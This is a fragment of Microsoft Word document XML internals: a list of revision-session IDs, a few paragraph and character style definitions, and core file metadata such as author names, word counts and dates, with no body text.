    <w:rsid w:val="007D2DE0"/>
    <w:rsid w:val="007D5231"/>
    <w:rsid w:val="007E7087"/>
    <w:rsid w:val="0080242A"/>
    <w:rsid w:val="00803118"/>
    <w:rsid w:val="00805EC5"/>
    <w:rsid w:val="00831EAA"/>
    <w:rsid w:val="008357B0"/>
    <w:rsid w:val="00841443"/>
    <w:rsid w:val="00847190"/>
    <w:rsid w:val="008501B1"/>
    <w:rsid w:val="008514B1"/>
    <w:rsid w:val="00856D48"/>
    <w:rsid w:val="00862859"/>
    <w:rsid w:val="00862DE1"/>
    <w:rsid w:val="00885F69"/>
    <w:rsid w:val="008A0625"/>
    <w:rsid w:val="008A1EAD"/>
    <w:rsid w:val="008A25B8"/>
    <w:rsid w:val="008B515A"/>
    <w:rsid w:val="008C3690"/>
    <w:rsid w:val="008C4966"/>
    <w:rsid w:val="008D2C63"/>
    <w:rsid w:val="008D2E43"/>
    <w:rsid w:val="008E3769"/>
    <w:rsid w:val="008F2305"/>
    <w:rsid w:val="00907655"/>
    <w:rsid w:val="00907ECD"/>
    <w:rsid w:val="00910F86"/>
    <w:rsid w:val="00917D39"/>
    <w:rsid w:val="00921698"/>
    <w:rsid w:val="0092782D"/>
    <w:rsid w:val="00931D4A"/>
    <w:rsid w:val="00932F43"/>
    <w:rsid w:val="00935BFA"/>
    <w:rsid w:val="00943195"/>
    <w:rsid w:val="00953970"/>
    <w:rsid w:val="00984586"/>
    <w:rsid w:val="00986D66"/>
    <w:rsid w:val="0099137C"/>
    <w:rsid w:val="0099681E"/>
    <w:rsid w:val="009A4443"/>
    <w:rsid w:val="009A509E"/>
    <w:rsid w:val="009A6971"/>
    <w:rsid w:val="009A7BF5"/>
    <w:rsid w:val="009A7C23"/>
    <w:rsid w:val="009B1EF9"/>
    <w:rsid w:val="009C4171"/>
    <w:rsid w:val="009C52D8"/>
    <w:rsid w:val="009D2316"/>
    <w:rsid w:val="009D4D20"/>
    <w:rsid w:val="009D733E"/>
    <w:rsid w:val="009E5E47"/>
    <w:rsid w:val="009F3597"/>
    <w:rsid w:val="009F5270"/>
    <w:rsid w:val="00A005EB"/>
    <w:rsid w:val="00A05FCF"/>
    <w:rsid w:val="00A1693C"/>
    <w:rsid w:val="00A1768F"/>
    <w:rsid w:val="00A2513E"/>
    <w:rsid w:val="00A42670"/>
    <w:rsid w:val="00A50E86"/>
    <w:rsid w:val="00A66210"/>
    <w:rsid w:val="00A8054C"/>
    <w:rsid w:val="00A94412"/>
    <w:rsid w:val="00AA5715"/>
    <w:rsid w:val="00AB12A5"/>
    <w:rsid w:val="00AB748E"/>
    <w:rsid w:val="00AC5E8F"/>
    <w:rsid w:val="00AC6D0E"/>
    <w:rsid w:val="00AD46B8"/>
    <w:rsid w:val="00AD69DF"/>
    <w:rsid w:val="00AE75E7"/>
    <w:rsid w:val="00AF5AAB"/>
    <w:rsid w:val="00AF75E4"/>
    <w:rsid w:val="00AF767F"/>
    <w:rsid w:val="00B01ED2"/>
    <w:rsid w:val="00B03C1F"/>
    <w:rsid w:val="00B1326D"/>
    <w:rsid w:val="00B14DE0"/>
    <w:rsid w:val="00B1629A"/>
    <w:rsid w:val="00B175F5"/>
    <w:rsid w:val="00B17A42"/>
    <w:rsid w:val="00B33884"/>
    <w:rsid w:val="00B3553C"/>
    <w:rsid w:val="00B5525B"/>
    <w:rsid w:val="00B62634"/>
    <w:rsid w:val="00B67E99"/>
    <w:rsid w:val="00B7209F"/>
    <w:rsid w:val="00B85D34"/>
    <w:rsid w:val="00B90941"/>
    <w:rsid w:val="00BA179B"/>
    <w:rsid w:val="00BA656A"/>
    <w:rsid w:val="00BB73D2"/>
    <w:rsid w:val="00BD6465"/>
    <w:rsid w:val="00BF0475"/>
    <w:rsid w:val="00C03157"/>
    <w:rsid w:val="00C10DFC"/>
    <w:rsid w:val="00C12CB9"/>
    <w:rsid w:val="00C21DC7"/>
    <w:rsid w:val="00C269E7"/>
    <w:rsid w:val="00C27E6E"/>
    <w:rsid w:val="00C32789"/>
    <w:rsid w:val="00C40E30"/>
    <w:rsid w:val="00C5160A"/>
    <w:rsid w:val="00C52A41"/>
    <w:rsid w:val="00C54377"/>
    <w:rsid w:val="00C56F30"/>
    <w:rsid w:val="00C62B8A"/>
    <w:rsid w:val="00C70610"/>
    <w:rsid w:val="00C7375C"/>
    <w:rsid w:val="00C771F1"/>
    <w:rsid w:val="00C85AAB"/>
    <w:rsid w:val="00C910A2"/>
    <w:rsid w:val="00C932DF"/>
    <w:rsid w:val="00C93A97"/>
    <w:rsid w:val="00CA7D1C"/>
    <w:rsid w:val="00CB20A4"/>
    <w:rsid w:val="00CB5EF0"/>
    <w:rsid w:val="00CC0596"/>
    <w:rsid w:val="00CC1118"/>
    <w:rsid w:val="00CC1F98"/>
    <w:rsid w:val="00CD23F3"/>
    <w:rsid w:val="00CD4D62"/>
    <w:rsid w:val="00CD723E"/>
    <w:rsid w:val="00CE1C84"/>
    <w:rsid w:val="00CF1E06"/>
    <w:rsid w:val="00D3696D"/>
    <w:rsid w:val="00D43794"/>
    <w:rsid w:val="00D565CC"/>
    <w:rsid w:val="00D81B0E"/>
    <w:rsid w:val="00D83F5E"/>
    <w:rsid w:val="00D9287E"/>
    <w:rsid w:val="00D93427"/>
    <w:rsid w:val="00DA4FE6"/>
    <w:rsid w:val="00DB0220"/>
    <w:rsid w:val="00DB2398"/>
    <w:rsid w:val="00DB5282"/>
    <w:rsid w:val="00DB7536"/>
    <w:rsid w:val="00DD13E6"/>
    <w:rsid w:val="00DD4347"/>
    <w:rsid w:val="00DD6E6B"/>
    <w:rsid w:val="00DD7562"/>
    <w:rsid w:val="00DD7AE3"/>
    <w:rsid w:val="00DE6809"/>
    <w:rsid w:val="00DF29FC"/>
    <w:rsid w:val="00DF48FB"/>
    <w:rsid w:val="00E22183"/>
    <w:rsid w:val="00E26E76"/>
    <w:rsid w:val="00E32223"/>
    <w:rsid w:val="00E34FE3"/>
    <w:rsid w:val="00E4080C"/>
    <w:rsid w:val="00E52F1D"/>
    <w:rsid w:val="00E545EF"/>
    <w:rsid w:val="00E62DF5"/>
    <w:rsid w:val="00E6669A"/>
    <w:rsid w:val="00E66A11"/>
    <w:rsid w:val="00E81F58"/>
    <w:rsid w:val="00E95CF6"/>
    <w:rsid w:val="00E977E8"/>
    <w:rsid w:val="00EA7A80"/>
    <w:rsid w:val="00EC3DE2"/>
    <w:rsid w:val="00ED1A5D"/>
    <w:rsid w:val="00ED2475"/>
    <w:rsid w:val="00ED2844"/>
    <w:rsid w:val="00EE1FFC"/>
    <w:rsid w:val="00EE21BE"/>
    <w:rsid w:val="00EF3F57"/>
    <w:rsid w:val="00EF428B"/>
    <w:rsid w:val="00F02AFE"/>
    <w:rsid w:val="00F10E29"/>
    <w:rsid w:val="00F1170B"/>
    <w:rsid w:val="00F23B28"/>
    <w:rsid w:val="00F23EC0"/>
    <w:rsid w:val="00F246D1"/>
    <w:rsid w:val="00F439B9"/>
    <w:rsid w:val="00F70504"/>
    <w:rsid w:val="00F72AAA"/>
    <w:rsid w:val="00F75782"/>
    <w:rsid w:val="00FA5D44"/>
    <w:rsid w:val="00FA63AF"/>
    <w:rsid w:val="00FB007E"/>
    <w:rsid w:val="00FB142F"/>
    <w:rsid w:val="00FB4A08"/>
    <w:rsid w:val="00FC3666"/>
    <w:rsid w:val="00FD1CD5"/>
    <w:rsid w:val="00FE2F14"/>
    <w:rsid w:val="00FF1D21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2CCA"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{3264B6A5-832E-4B90-A2BE-6E7B7044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30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397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6B3"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Foot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6B3"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="009B1EF9"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="s1">
    <w:name w:val="s1"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="003B285F"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="p1">
    <w:name w:val="p1"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="003B285F"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
      <w:color w:val="2323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5B7721-5363-C84F-9219-AD8DF5395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592</Words>
  <Characters>3660</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>192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Moschcovich</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>احمد عماد الدين عبدالمنعم موسى</cp:lastModifiedBy>
  <cp:revision>13</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-04-22T19:04:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-03T18:07:00Z</dcterms:modified>
</cp:coreProperties>
</file>